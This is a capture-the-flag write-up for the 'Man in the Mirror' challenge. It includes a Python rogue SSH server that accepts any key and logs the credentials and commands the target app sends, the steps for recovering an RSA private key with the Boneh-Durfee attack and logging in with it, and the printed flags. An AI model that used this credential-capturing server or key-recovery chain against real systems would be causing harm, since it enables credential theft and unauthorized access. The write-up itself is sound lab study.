CTFtime.org

Man in the Mirror

by maro / Pwnium

Rating: 5.0

[+] Create SSH server with mickey user and provide it to the app

[+] Listen to the incoming SSH connection. Retrieve the public key used for authentication and the sent command

echo NDH{a_WInN3r_15_A_Dr3AMeR > ~/flag_1.txt

```
import socket
from paramiko import paramiko
import threading
import sys
import traceback
# using the key from the Paramiko demo files
host_key = paramiko.RSAKey(filename='test_rsa.key')
paramiko.util.log_to_file("filename.log")
class Server (paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind=='session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_none(self, user):
return paramiko.AUTH_FAILED
def check_auth_password(self,user, password):
print(user, password)
return paramiko.AUTH_FAILED
def check_auth_publickey(self, username, key):
print (key.public_numbers)
print('Auth attempt with key: ' + key.get_fingerprint().encode('hex'))
return paramiko.AUTH_SUCCESSFUL
def get_allowed_auths(self, username):
return 'password,publickey'
def check_channel_exec_request(self, channel, command):
print('Command:', command)
self.event.set()
return True
server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port))
sock.listen(100) # Wow so many connections
print ("[+] Listening for connection ...")
client, addr = sock.accept()
except Exception, e:
print("[-] Listen failed: " + str(e))
traceback.print_stack()
sys.exit(1)
print("[+] Got a connection!") # runs as except exits
try:
bhSession = paramiko.Transport(client)
bhSession.add_server_key(host_key)
server = Server()
try:
bhSession.start_server(server=server)
except paramiko.SSHException, x:
print("[-] SSH negotiation failed.")
print("[+] Authenticated!")
chan = bhSession.accept(20)
print(chan.recv(1024))
except Exception, e:
print("[-] Caught exception: " + str(e))
try:
bhSession.close()
except:
pass
sys.exit(1)
```

[+] Determine private exponent d using Boneh Durfee attack on RSA based on the given (e,n) from retrieved public key
[https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage)

[+] Contruct private key mickey.key (PEM)

[+] ssh -i mickey.key [email protected] -p 2222 using mickey.key private key

[+] cat flag_2.txt
_Wh0_NeV3R_gIve5_uP}

Comments